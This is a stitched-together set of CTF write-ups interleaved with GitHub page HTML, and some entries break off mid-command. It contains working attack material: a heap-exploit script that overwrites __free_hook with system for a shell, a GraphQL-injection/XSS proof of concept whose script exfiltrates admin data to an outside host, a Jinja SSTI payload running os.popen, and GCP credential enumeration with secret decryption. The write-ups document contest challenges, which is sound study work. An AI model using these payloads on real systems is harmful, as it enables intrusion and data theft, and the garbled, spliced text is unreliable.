##Failed LoginsMy approach might not be correct but it worked in this case.
1.Rename the apk file:::: using ---mv chall.apk chall.zip
d2j-dex2jar -d chall.zip
jd-gui chall-dex2jar.jar
</div>
<details class="details-reset details-overlay details-overlay-dark" id="jumpto-line-details-dialog"> <summary data-hotkey="l" aria-label="Jump to line"></summary> <details-dialog class="Box Box--overlay d-flex flex-column anim-fade-in fast linejump" aria-label="Jump to line"> </option></form><form class="js-jump-to-line-form Box-body d-flex" action="" accept-charset="UTF-8" method="get"> <input class="form-control flex-auto mr-3 linejump-input js-jump-to-line-field" type="text" placeholder="Jump to line…" aria-label="Jump to line" autofocus> <button data-close-dialog="" type="submit" data-view-component="true" class="btn"> Go
</button></form> </details-dialog> </details>
</div>
</div></div>
</main> </div>
</div>
<div class="footer container-xl width-full p-responsive" role="contentinfo"> <div class="position-relative d-flex flex-row-reverse flex-lg-row flex-wrap flex-lg-nowrap flex-justify-center flex-lg-justify-between pt-6 pb-2 mt-6 f6 color-fg-muted border-top color-border-muted "> © 2021 GitHub, Inc. Terms Privacy Security Status Docs
<svg aria-hidden="true" height="24" viewBox="0 0 16 16" version="1.1" width="24" data-view-component="true" class="octicon octicon-mark-github"> <path fill-rule="evenodd" d="M8 0C3.58 0 0 3.58 0 8c0 3.54 2.29 6.53 5.47 7.59.4.07.55-.17.55-.38 0-.19-.01-.82-.01-1.49-2.01.37-2.53-.49-2.69-.94-.09-.23-.48-.94-.82-1.13-.28-.15-.68-.52-.01-.53.63-.01 1.08.58 1.23.82.72 1.21 1.87.87 2.33.66.07-.52.28-.87.51-1.07-1.78-.2-3.64-.89-3.64-3.95 0-.87.31-1.59.82-2.15-.08-.2-.36-1.02.08-2.12 0 0 .67-.21 2.2.82.64-.18 1.32-.27 2-.27.68 0 1.36.09 2 .27 1.53-1.04 2.2-.82 2.2-.82.44 1.1.16 1.92.08 2.12.51.56.82 1.27.82 2.15 0 3.07-1.87 3.75-3.65 3.95.29.25.54.73.54 1.48 0 1.07-.01 1.93-.01 2.2 0 .21.15.46.55.38A8.013 8.013 0 0016 8c0-4.42-3.58-8-8-8z"></path></svg> Contact GitHub Pricing API Training Blog About </div> <div class="d-flex flex-justify-center pb-6"> <span></span> </div></div>
<div id="ajax-error-message" class="ajax-error-message flash flash-error" hidden> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-alert"> <path fill-rule="evenodd" d="M8.22 1.754a.25.25 0 00-.44 0L1.698 13.132a.25.25 0 00.22.368h12.164a.25.25 0 00.22-.368L8.22 1.754zm-1.763-.707c.659-1.234 2.427-1.234 3.086 0l6.082 11.378A1.75 1.75 0 0114.082 15H1.918a1.75 1.75 0 01-1.543-2.575L6.457 1.047zM9 11a1 1 0 11-2 0 1 1 0 012 0zm-.25-5.25a.75.75 0 00-1.5 0v2.5a.75.75 0 001.5 0v-2.5z"></path></svg> <button type="button" class="flash-close js-ajax-error-dismiss" aria-label="Dismiss error"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path fill-rule="evenodd" d="M3.72 3.72a.75.75 0 011.06 0L8 6.94l3.22-3.22a.75.75 0 111.06 1.06L9.06 8l3.22 3.22a.75.75 0 11-1.06 1.06L8 9.06l-3.22 3.22a.75.75 0 01-1.06-1.06L6.94 8 3.72 4.78a.75.75 0 010-1.06z"></path></svg> </button> You can’t perform that action at this time. </div>
<div class="js-stale-session-flash flash flash-warn flash-banner" hidden > <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-alert"> <path fill-rule="evenodd" d="M8.22 1.754a.25.25 0 00-.44 0L1.698 13.132a.25.25 0 00.22.368h12.164a.25.25 0 00.22-.368L8.22 1.754zm-1.763-.707c.659-1.234 2.427-1.234 3.086 0l6.082 11.378A1.75 1.75 0 0114.082 15H1.918a1.75 1.75 0 01-1.543-2.575L6.457 1.047zM9 11a1 1 0 11-2 0 1 1 0 012 0zm-.25-5.25a.75.75 0 00-1.5 0v2.5a.75.75 0 001.5 0v-2.5z"></path></svg> <span>You signed in with another tab or window. Reload to refresh your session.</span> <span>You signed out in another tab or window. Reload to refresh your session.</span> </div> <template id="site-details-dialog"> <details class="details-reset details-overlay details-overlay-dark lh-default color-fg-default hx_rsm" open> <summary role="button" aria-label="Close dialog"></summary> <details-dialog class="Box Box--overlay d-flex flex-column anim-fade-in fast hx_rsm-dialog hx_rsm-modal"> <button class="Box-btn-octicon m-0 btn-octicon position-absolute right-0 top-0" type="button" aria-label="Close dialog" data-close-dialog> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path fill-rule="evenodd" d="M3.72 3.72a.75.75 0 011.06 0L8 6.94l3.22-3.22a.75.75 0 111.06 1.06L9.06 8l3.22 3.22a.75.75 0 11-1.06 1.06L8 9.06l-3.22 3.22a.75.75 0 01-1.06-1.06L6.94 8 3.72 4.78a.75.75 0 010-1.06z"></path></svg> </button> <div class="octocat-spinner my-6 js-details-dialog-spinner"></div> </details-dialog> </details></template>
<div class="Popover js-hovercard-content position-absolute" style="display: none; outline: none;" tabindex="0"> <div class="Popover-message Popover-message--bottom-left Popover-message--large Box color-shadow-large" style="width:360px;"> </div></div>
<template id="snippet-clipboard-copy-button"> <div class="zeroclipboard-container position-absolute right-0 top-0"> <clipboard-copy aria-label="Copy" class="ClipboardButton btn js-clipboard-copy m-2 p-0 tooltipped-no-delay" data-copy-feedback="Copied!" data-tooltip-direction="w"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-copy js-clipboard-copy-icon m-2"> <path fill-rule="evenodd" d="M0 6.75C0 5.784.784 5 1.75 5h1.5a.75.75 0 010 1.5h-1.5a.25.25 0 00-.25.25v7.5c0 .138.112.25.25.25h7.5a.25.25 0 00.25-.25v-1.5a.75.75 0 011.5 0v1.5A1.75 1.75 0 019.25 16h-7.5A1.75 1.75 0 010 14.25v-7.5z"></path><path fill-rule="evenodd" d="M5 1.75C5 .784 5.784 0 6.75 0h7.5C15.216 0 16 .784 16 1.75v7.5A1.75 1.75 0 0114.25 11h-7.5A1.75 1.75 0 015 9.25v-7.5zm1.75-.25a.25.25 0 00-.25.25v7.5c0 .138.112.25.25.25h7.5a.25.25 0 00.25-.25v-7.5a.25.25 0 00-.25-.25h-7.5z"></path></svg> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-check js-clipboard-check-icon color-text-success d-none m-2"> <path fill-rule="evenodd" d="M13.78 4.22a.75.75 0 010 1.06l-7.25 7.25a.75.75 0 01-1.06 0L2.22 9.28a.75.75 0 011.06-1.06L6 10.94l6.72-6.72a.75.75 0 011.06 0z"></path></svg> </clipboard-copy> </div></template>
</body></html>
|
# writeupWrite up for the `Lost n Found` challenge
## Enumeration #1
Check what we can do with attached file `legacy.json`. Inside this file we can see there are a credentials for service account in the GCP:* service account: `[email protected]`* project id: `ductf-lost-n-found`
By using below command we can login to the GCP project `ductf-lost-n-found`
```bashgcloud auth activate-service-account --key-file=legacy.jsongcloud config set project ductf-lost-n-found```
## Enumeration #2
Next step is checking all possible resources which we are able to use by above service account. We used for this enumeration `gcloud` CLI and try to list resources for all possible parameters. Most of API's in the GCP was disabled but...
After enumeration we can see only `secrets` and `kms` APIs are enabled in the `ductf-lost-n-found` project and service account `[email protected]` has an access to this resources.
## Enumaration #3
Based on `Enumeration #2` research we can extract secret to the `secret_enc` file and save all available keys.
```bashgcloud secrets listgcloud secrets versions access latest --secret="unused_data" |base64 -d >secret_encgcloud kms keyrings list --location australia-southeast2 # we know CTF is played in Australiagcloud kms keys list --keyring projects/ductf-lost-n-found/locations/australia-southeast2/keyRings/wardens-locks |tail -n +2 |awk '{ print $1 }' |sed 's/^.*cryptoKeys\///g' >keys```
## Check the final flag
Now we have `keys` file with the list of all available keys and `secret_enc` file with the secret in the encrypted form, so we can try to use one of the key to decrypt the secret.
```bashwhile read line; do gcloud kms decrypt --key $line --ciphertext-file=secret_enc --plaintext-file=secret_dec --location australia-southeast2 --keyring=wardens-locks; done |
pseudocode for solution
```pythonp = elf.process()
def menu(ch, pt="Choice: "): wsnd(ch, pt)
def malloc(sz, data="XXXXXXXX"): menu(1) p.sendlineafter( "size: ",sz) if data: p.sendlineafter("data: ",data)
def free(): menu(3)
def show(): menu(2) return pr("1.")[:-3]
# Overwrite top chunk to a smaller size (prev in use set && page aligned)malloc(0x18, b"A" * 0x18 + pack(0x1d51))# Allocate memory larger than the new top chunk size causing a free operationmalloc(0x2000)
# make an allocation from unsorted bin and immediately free itmalloc(0x518, "AAAAAAAA")free()
# Use read after free to leak libc address from freed chunkdump = show()mallochook = solver.dpaddr(dump, 0) - 0x70
# Get free hook and system usinf libc leaksolver.libc.init_base(mallochook, "__malloc_hook")fhook = libc.sym["__free_hook"]system = pack(libc.sym["system"])
# get one entry in 0x70 tcachemalloc(0x68) # chunk Afree()
malloc(0x28) # chunk Bfree()
malloc(0x58) # chunk Cfree()
# Realloc chunk B and owerwrite chunk C sizefield to 0x71malloc(0x28, b"B" * 0x28 + pack(0x71))free()
# Alloc chunk C from 0x60 tcache and free it to 0x70 tcachemalloc(0x58)free()
# Realloc Chunk B and owerwrite fd of chunk C to __free_hookmalloc(0x28, b"A" * 0x28 + pack(0x71) + pack(fhook))
malloc(0x68) # Move __free_hook to head of tcache 0x70malloc(0x68, system) # Owerwrite __free_hook with system
# system("/bin/sh")malloc(0x18, "/bin/sh\0")free()
p.interactive()``` |
# CheckIn
## How to Setup Environment
move `challenge.yml` to your repository `.github/workflows/challenge.yml
## Write Up
1. GitHub masks secrets when they are printed to the console like `***`2. the flag is just a few numbers
just make a script to generate payload and it also can prevent others get the flag from your issue
```python
import randoma=[False for i in range(1000000)]payload = "01234"count = 1while True: n = random.choice("0123456789") now = payload[-4:] + n if not a[int(now)]: payload+=n count+=1 if count %100 == 0 : print(f"process :{count}/99999,payload length: {len(payload)}") with open("payload.txt","w") as f: f.write(payload) if count == 99999: print("finish") break``` |
This challenge is to solve using a csrf + xss + dompurify bypss.
Korean Version : https://pocas.kr/2021/09/26/2021-09-26-DownUnderCTF-2021/#Notepad-473-pts |
When creating a task in a ctf the description is rendered as HTML but there is some sanitization.The name is rendered as a string but without sanitization.
The function `ctf` in `query.js` is vulnerable to graphql injection.
```javascript=async function ctf(id) { return await query(`{ wtf(id: ${id}) { # Injection in id here name description challs { name points description } } }`)}```
We can modify the graphql query an abuse aliases to get name instead of description
Exploit:* Create a WTF (id=2)* Create chall with the xss in the name* make the admin visit `/?#wtf/2){id,challs{description:name}}a:wtf(id:2`* profit
poc.py
```python#!/usr/bin/env python# type: ignore from pwn import *import timefrom request import Sessionimport reimport jsonfrom subprocess import check_output
def jprint(j): print(json.dumps(j, indent=2))
prefix_reg = re.compile("sha1\(([a-f0-9]+)")url_reg = re.compile(".* listening on (.*)")
sh = remote("hyper.tasteless.eu", 10301)s = Session()
def connect(): l = sh.readline().decode() h = prefix_reg.findall(l)[0] cmd = f"go run pow.go {h} 000000" print(cmd) p = check_output(cmd, shell=True).strip() sh.sendline(p) print(sh.readline()) l = sh.readline().decode() url = url_reg.findall(l)[0] print(url) return url
url = connect()
def send_query(query): data = { "query": query, "variables": {} } r = s.post(url + "graphql", json=data).json() jprint(r)
time.sleep(1)
send_query("""mutation register{ register(username:"bitk", password:"bitk")}
""")send_query("""mutation authenticate{ authenticate(username:"bitk", password:"bitk")}
""")
send_query(""" mutation createWTF{ createWTF(input: {name:"xss", description:"xss"}){id}}
""")
send_query(""" mutation createChall{ createChall(input: {wtf:2, name:"<iframe srcdoc=\\"<script src='https://bi.tk/zob/xss.js'></script>\\"></iframe>", description:"xss"}){id}}
""")sh.interactive()
```
make the admin visit `/?#wtf/2){id,challs{description:name}}a:wtf(id:2` to trigger the javascript
Xss.js```javascriptasync function main(){ const r = await parent.query(`{organizers{ wtfs{ challs{ name flag } }}}`, {}) const msg = btoa(JSON.stringify(r.data)) await fetch("https://bi.tk/?"+msg, { mode:'no-cors'})}
main()
``` |
# Mega-MailerCategory: Web
Points: 591
Description: We recently launched a mass email sender that can work with any SMTP server, but recently we have reports of information leaks and and trolling through our service. Can you find whats wrong with it ?
Url: http://very.uniquename.xyz:8080/
This `Mega Mailer` challenge is one of the hardest web challenges in this CTF. Me and my teammates need to spend a lot of times on this challenges. However This was a nice challenge. Thanks to CTF organizarers and challenge authors for making Amazing Challenges.

When We go to website, we can see that we can put `SMTP Ip and Port` and We can see `Example CSV file` named `recipitents(1).csv`.

# Thinking The Vulnerability
First i am spending time with injecting `SQL injection` and `XSS`. We got `500` error everytime. And After a while one of my teammates found that we need to put real `SMTP server and port.` So i tested `smtp.google.com` in `Host` field and put `25 in Port` field. and we submit it but get `500` error. What??.
After a while, i understand that we need to put `recipitents(1).csv` to submit our input to ping to `smtp.google.com`. So tried to ping with the file and got success. we can ping but not get anything. But THis is our first success.
After while, i got a idea to run our `smtp` server locally and do `port forward` to make our local `smtp server` to be global. So we can get response from server in our machine.
For that i used free `vps container` service called [goorm](https://ide.goorm.io/) that can do port forward.
 And i host my `smtp` server in vps locally by python3 `python3 -m smtpd -c DebuggingServer -n 0.0.0.0:45` and do port forward.
And i put the `vps machine port forwarded ip and port` in Host and port field and Test the `SSTI` in `Main Body` field.
And got response back with `4`. So that mean our `SSTI` injection is success. Bingo! ?
After tesing many `SSTI` payloads. One payload from [PayloadsAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection) worked.
The Payload is `{{ self._TemplateReference__context.cycler.__init__.__globals__.os.popen('id').read() }}` and it worked and return with flag. Bingo! again ?.
# Flagdsc{819_8r41n_m41L3R}
# Thanks For Reading! |
The source code is fairly straightfoward. First the `init` function disables buffering. Then, two 64 byte buffers are initialized: `flag` and `your_try`. The former is read from the file at `./file`, and the latter is read from `scanf`. These buffers are then compared using `strncmp`. If the strings match, then the `win` function is ran, which gives us shell access by running `system("/bin/sh")`.
Our goal is clearly to run `win` by getting `strncmp(your_try, flag, length) == 0` to return `true`. The C documenation tells us the following about `strncmp`:
**This function starts comparing the first character of each string. If they are equal to each other, it continues with the following pairs until the characters differ, until a terminating null-character is reached, or until num characters match in both strings, whichever happens first.** The key here is "until a terminating null-character is reached". This means that the funciton will stop comparing once it reaches a null byte (`0x00`) in either string. So, if we start our input with a null byte, then it will stop comparing immediately and think that `your_try` is equal to `flag`. Since `scanf` reads 64 bytes, we will pass 64 null bytes as our inputs.
Once we have shell access, we can just run `cat ./flag` to read the flag. We will append this to our input, along with `\n` at the end so that the shell runs our command. We can pass this input into `nc` using `printf`. The command that does this is:
```(printf "\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0cat ./flag\n") | nc 34.146.101.4 30007``` |
# Please Challenge Writeup (03/10/2021)As the name suggests, this challenge requires you to adjust your requests according to the server in order to retrieve the flag.
## 1. Examine the target
The target consists of a page asking you to provide an username.Let's try a random one (cptee):
It seems that Clancy is the only username that can access the website.
## 2. Submit Clancy as the UsernameWhen we submit Clancy as the username, a different error is shown:
That's is odd. Let's try analyzing our request with Burp Suite.
## 3. Admin_Access Flag
There is a flag called Admin_Access set as False.Switch it to True and the following happens:
Seems like we have the wrong browser.Refresh the page and send the request to Burp's Repeater.
## 4. User-AgentSince the server will only accept requests from DeemaBrowser, by changing our User-Agent we can bypass this requirement.
Response:
## 5. Basic AuthenticationWe have to provide an Authorization Header with "What'sTheMagicWord?" as the passphrase. Please add the header below to your request:
```Authorization: Basic <credentials>```
Substitute credentials to What'sTheMagicWord? base64 encoded
```Authorization: Basic V2hhdCdzVGhlTWFnaWNXb3JkPw==```
Response:
Seems like we also need to provide a date in order to access the files.
## 6. DateSyntax```Date: <day-name>, <day> <month> <year> <hour>:<minute>:<second> GMT```
Let's provide a date in April 2021 and analyze the response:```Date: Thu, 1 Apr 2021 12:00:00 GMT```
Change the date to Monday, 5th of April:```Date: Mon, 5 Apr 2021 12:00:00 GMT```
Retrieve the Flag and that's it!
Thank you for reading.
|
<html lang="en" data-color-mode="auto" data-light-theme="light" data-dark-theme="dark"> <head> <meta charset="utf-8"> <link rel="dns-prefetch" href="https://github.githubassets.com"> <link rel="dns-prefetch" href="https://avatars.githubusercontent.com"> <link rel="dns-prefetch" href="https://github-cloud.s3.amazonaws.com"> <link rel="dns-prefetch" href="https://user-images.githubusercontent.com/"> <link rel="preconnect" href="https://github.githubassets.com" crossorigin> <link rel="preconnect" href="https://avatars.githubusercontent.com">
<link crossorigin="anonymous" media="all" integrity="sha512-L06pZD/4Yecj8D8pY5aYfA7oKG6CI8/hlx2K9ZlXOS/j5TnYEjrusaVa9ZIb9O3/tBHmnRFLzaC1ixcafWtaAg==" rel="stylesheet" href="https://github.githubassets.com/assets/light-2f4ea9643ff861e723f03f296396987c.css" /><link crossorigin="anonymous" media="all" integrity="sha512-xcx3R1NmKjgOAE2DsCHYbus068pwqr4i3Xaa1osduISrxqYFi3zIaBLqjzt5FM9VSHqFN7mneFXK73Z9a2QRJg==" rel="stylesheet" href="https://github.githubassets.com/assets/dark-c5cc774753662a380e004d83b021d86e.css" /><link data-color-theme="dark_dimmed" crossorigin="anonymous" media="all" integrity="sha512-xlDV9el7Cjd+KTSbwspx+c8its28uxn++hLZ9pqYYo1zOVcpLPlElTo42iA/8gV3xYfLvgqRZ3dQPxHCu4UaOQ==" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_dimmed-c650d5f5e97b0a377e29349bc2ca71f9.css" /><link data-color-theme="dark_high_contrast" crossorigin="anonymous" media="all" integrity="sha512-jkzjbgytRSAyC4EMcrdpez+aJ2CROSpfemvgO2TImxO6XgWWHNG2qSr2htlD1SL78zfuPXb+iXaVTS5jocG0DA==" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_high_contrast-8e4ce36e0cad4520320b810c72b7697b.css" /><link data-color-theme="dark_colorblind" crossorigin="anonymous" media="all" integrity="sha512-FzS8HhJ7XSHmx/dBll4FYlvu+8eivvb7jnttZy9KM5plsMkgbEghYKJszrFFauqQvv7ezYdbk7v/d8UtdjG9rw==" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_colorblind-1734bc1e127b5d21e6c7f741965e0562.css" /><link data-color-theme="light_colorblind" crossorigin="anonymous" media="all" integrity="sha512-IpkvxndMpMcO4paMJl83lYTcy18jv2jqG7mHZnTfr9HRV09iMhuQ/HrE+4mQO2nshL7ZLejO1OiVNDQkyVFOCA==" rel="stylesheet" data-href="https://github.githubassets.com/assets/light_colorblind-22992fc6774ca4c70ee2968c265f3795.css" /> <link crossorigin="anonymous" media="all" integrity="sha512-4hzfg/znP4UxIOUt/r3SNYEZ6jBPJIS6PH4VC26tE0Nd4xAymMC3KXDaC9YITfG4fhyfxuB1YnDHo1H2iUwsfg==" rel="stylesheet" href="https://github.githubassets.com/assets/frameworks-e21cdf83fce73f853120e52dfebdd235.css" /> <link crossorigin="anonymous" media="all" integrity="sha512-sT0AyFLl78shyaRWRXOw8uwRSnR+7tURIXoJwVYadATkrqeWfze5y/tOu8MS1mbzUKl6pgLjfEdT+U8bwBJHfQ==" rel="stylesheet" href="https://github.githubassets.com/assets/behaviors-b13d00c852e5efcb21c9a4564573b0f2.css" /> <link crossorigin="anonymous" media="all" integrity="sha512-jdtbQr5ZSKZqID/c80i87Ml+YyEhYVd5sF9szeR+Xuvbfhi4yLJbEsSllzk0XRzcbWqD4tDtshhRo5IuJx4Mzw==" rel="stylesheet" href="https://github.githubassets.com/assets/github-8ddb5b42be5948a66a203fdcf348bcec.css" />
<script crossorigin="anonymous" defer="defer" integrity="sha512-/0zs/So9AxtDONKx324yW8s62PoPMx4Epxmk1aJmMgIYIKUkQg4YqlZQ06B4j0tSXQcUB8/zWiIkhLtVEozU/w==" type="application/javascript" src="https://github.githubassets.com/assets/environment-ff4cecfd.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-8p4kkx6e3xBq1g3NP0O3/AW/aiTQ+VRxYencIeMD8crx7AEwrOTV+XOL/UE8cw4vEvkoU/zzLEZ9cud0jFfI4w==" type="application/javascript" src="https://github.githubassets.com/assets/chunk-frameworks-f29e2493.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-slE3Aa2Duzwgju0UbTfes+w5slmaEOhXwom+Ev+pPsxxOpeh2CGZqfriJGr6pkhTZX+ffOTTYl3GnSLtp7AkJw==" type="application/javascript" src="https://github.githubassets.com/assets/chunk-vendor-b2513701.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-ZDU7IsI6lFo4eeBuqkrh/Htsa12ZYOi44uBhKqG0LyV6XHM502iJjjsIVnmtmNXrrC9oGMf2O5i57Bx4lwGsXw==" type="application/javascript" src="https://github.githubassets.com/assets/behaviors-64353b22.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-ODZJzCJpaOfusrIka5QVZQcPiO9LBGyrrMYjhhJWSLuCN5WbZ5xiEiiOPOKVu71dqygyRdB2TY7AKPA1J5hqdg==" type="application/javascript" data-module-id="./chunk-unveil.js" data-src="https://github.githubassets.com/assets/chunk-unveil-383649cc.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-emPgUbSwW9ezLCgRnTE7n4fbbfc/MqEEDHmnkmG61dTyjWKHTYKN4wN3OPS7SY0fwmSJ8mB5+gng2nZw4/HsUg==" type="application/javascript" data-module-id="./chunk-animate-on-scroll.js" data-src="https://github.githubassets.com/assets/chunk-animate-on-scroll-7a63e051.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-pWX6rMbTl/ERAhhtbAyXiJzoXFr91jp/mRy2Xk4OpAId3aVFI2X+yI8X3mhbf985F5BRHamuRx20kG62nRtSLQ==" type="application/javascript" data-module-id="./chunk-ref-selector.js" data-src="https://github.githubassets.com/assets/chunk-ref-selector-a565faac.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-GKiNgfnSOtC7SUFIvLZMYoteE7iKDONxzaeovKiziJczuW1P4KMU1KhXeoTv4WEN0ufeXC9ejA8HvgYa+xPAAQ==" type="application/javascript" data-module-id="./chunk-filter-input.js" data-src="https://github.githubassets.com/assets/chunk-filter-input-18a88d81.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-HRWFwpj3BLrXflQCvPbnuXPFjpnti5TtcqJqUx/b6klMyuskNlUBIo+1UT0KVHFdEW/Y9QKjmXlZxhP6z1j5pg==" type="application/javascript" data-module-id="./chunk-edit.js" data-src="https://github.githubassets.com/assets/chunk-edit-1d1585c2.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-GhqHDMwaAgqUsjVyltYVhaaLYy2G887rPRXXNbsdaI+Xm3dh0fbaHLhZns70EjFAEpXBgCAYFYdnlG1IQFmz1A==" type="application/javascript" data-module-id="./chunk-responsive-underlinenav.js" data-src="https://github.githubassets.com/assets/chunk-responsive-underlinenav-1a1a870c.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-gmw7obKL/JEHWPp6zWFh+ynbXUFOidj1DN2aPiTDwP8Gair0moVuDmA340LD84A29I3ZPak19CEiumG+oIiseg==" type="application/javascript" data-module-id="./chunk-tag-input.js" data-src="https://github.githubassets.com/assets/chunk-tag-input-826c3ba1.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-Ao9llFIlj54ApuKf2QLboXukbu2h7MHfMmtYHrrsVe1lprKNLiA0usVcRpvruKhfT5STDuWm/GGmyx8ox27hWQ==" type="application/javascript" data-module-id="./chunk-notification-list-focus.js" data-src="https://github.githubassets.com/assets/chunk-notification-list-focus-028f6594.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-SPWd3rzrxmU6xW6vy1JPWCd+3uWFWmnd0MVGpmw/TpHWUAdLWDqL8kWyC/sBIZJmda4mTtUO1DHJQzAXRSrC+g==" type="application/javascript" data-module-id="./chunk-cookies.js" data-src="https://github.githubassets.com/assets/chunk-cookies-48f59dde.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-MK53GXbb2BPV+ADlEbJbkrvg34WPcAd5RC2nBJhUH1tR/Mjr9xrsf56ptBajfWcIWKRKbqqRtLktgr0wAbB3zw==" type="application/javascript" data-module-id="./chunk-async-export.js" data-src="https://github.githubassets.com/assets/chunk-async-export-30ae7719.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-tw9SApiMkftVBYeb6/VGhEwGNw8tlyBhXc9RVXH4UbCD6u+48uuCMvXf3bxvBdOld0OoYg83SnD2mgJWhdaTiQ==" type="application/javascript" data-module-id="./chunk-premium-runners.js" data-src="https://github.githubassets.com/assets/chunk-premium-runners-b70f5202.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-D576CjzS9sbDqFBJdq0Y6+KVMHXkO6mLFO/GRL1NtoE8jgXjAvmdjoZ4nNMWyDwqbtBHspvupORzE9L+YoBLYQ==" type="application/javascript" data-module-id="./chunk-get-repo-element.js" data-src="https://github.githubassets.com/assets/chunk-get-repo-element-0f9efa0a.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-xhSAO0KtnFAlRqAK+mg8BPj/J334ccvnCmmjmBQBCgZcsoO9teHJSS6oAn3XOWYFsWPU2JehwG7S3OVEbLwdUg==" type="application/javascript" data-module-id="./chunk-color-modes.js" data-src="https://github.githubassets.com/assets/chunk-color-modes-c614803b.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-jitxouuFY6SUcDZV5W3jhadVEIfFBfCQZxfPV3kxNnsWEBzbxMJFp0ccLb7+OlBjSs1zU/MNtuOV6T9Ay7lx4w==" type="application/javascript" data-module-id="./chunk-copy.js" data-src="https://github.githubassets.com/assets/chunk-copy-8e2b71a2.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-Auj2atZZccqguPinFmOL2k1TCzZs/yfMMFF5aMYMB/5miqEN7v4oAFG0o3Np24NOTkJ9o/txZCeuT6NGHgGoUA==" type="application/javascript" data-module-id="./chunk-voting.js" data-src="https://github.githubassets.com/assets/chunk-voting-02e8f66a.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-HDsLJf6gAN+WDFaJneJwmIY82XkZKWqeX7tStBLRh1XM53K8vMV6JZvjq/UQXszaNVWxWcuYtgYTG6ZWo8+QSw==" type="application/javascript" data-module-id="./chunk-confetti.js" data-src="https://github.githubassets.com/assets/chunk-confetti-1c3b0b25.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-zEirtMGIgj3NVAnB8kWhDykK5NLa7q4ugkIxB7EftbovRjhU3X5I/20Rploa4KGPwAR27e36rAljHIsDKbTm/Q==" type="application/javascript" data-module-id="./chunk-codemirror.js" data-src="https://github.githubassets.com/assets/chunk-codemirror-cc48abb4.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-Gr3ZcJt5t73JeBM3NwOEziKyDZ3HpHwzqZL/c1pgTUfo+6QC5f88XXRw/RT6X2diwqvaa3OVFh0oWsZ9ZxhtdQ==" type="application/javascript" data-module-id="./chunk-tip.js" data-src="https://github.githubassets.com/assets/chunk-tip-1abdd970.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-EdQvlnI4Pu5Q6K0HCvp+mi0Vw9ZuwaEuhbnCbmFKX+c0xwiUWY0L3n9P0F6doLhaHhfpvW3718+miL11WG4BeA==" type="application/javascript" data-module-id="./chunk-line.js" data-src="https://github.githubassets.com/assets/chunk-line-11d42f96.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-4zSHP2sQXPKoN9jFy8q2ThHsQNej8s4qhubSR4g0/2dTexAEnoTG+RbaffdIhmjfghGjpS/DlE0cdSTFEOcipQ==" type="application/javascript" data-module-id="./chunk-array.js" data-src="https://github.githubassets.com/assets/chunk-array-e334873f.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-g8fb6U7h9SkWgiK69nfNMn4aN5D2YBYPZUbCIuLpemWoOw8NOaZY8Z0hPq4RUVs4+bYdCFR6K719k8lwFeUijg==" type="application/javascript" data-module-id="./chunk-band.js" data-src="https://github.githubassets.com/assets/chunk-band-83c7dbe9.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-6oWCu7ltWLHlroIRg8mR6RloC1wqKS9aK9e5THWgzaE2GNPAdoC+MLZEYD/TdIiZxsQRev0RInyonsXGBK0aMw==" type="application/javascript" data-module-id="./chunk-toast.js" data-src="https://github.githubassets.com/assets/chunk-toast-ea8582bb.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-miaiZ1xkDsWBUsURHOmeYtbgVKQGnm1octCo/lDXUmPzDyjtubnHULRVw1AK+sttwdwyB0+LOyhIVAWCNSGx+A==" type="application/javascript" data-module-id="./chunk-delayed-loading-element.js" data-src="https://github.githubassets.com/assets/chunk-delayed-loading-element-9a26a267.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-GD25CNhMGDMzEmeFhUT0FILBupAkx5/CHohnYXOP1togy40O0iu/lASaSp3gV8ue0nwscalJVQqR5gKDRHHDVg==" type="application/javascript" data-module-id="./chunk-three.module.js" data-src="https://github.githubassets.com/assets/chunk-three.module-183db908.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-4vVRplWFI7P4m3RHQ0QAhkq6eZUdtIE8PBhsKYJRwDkhQw9iK/U1st1/fM1tQZFuBFwGMyqaZblbWtQ+2ejcqQ==" type="application/javascript" data-module-id="./chunk-slug.js" 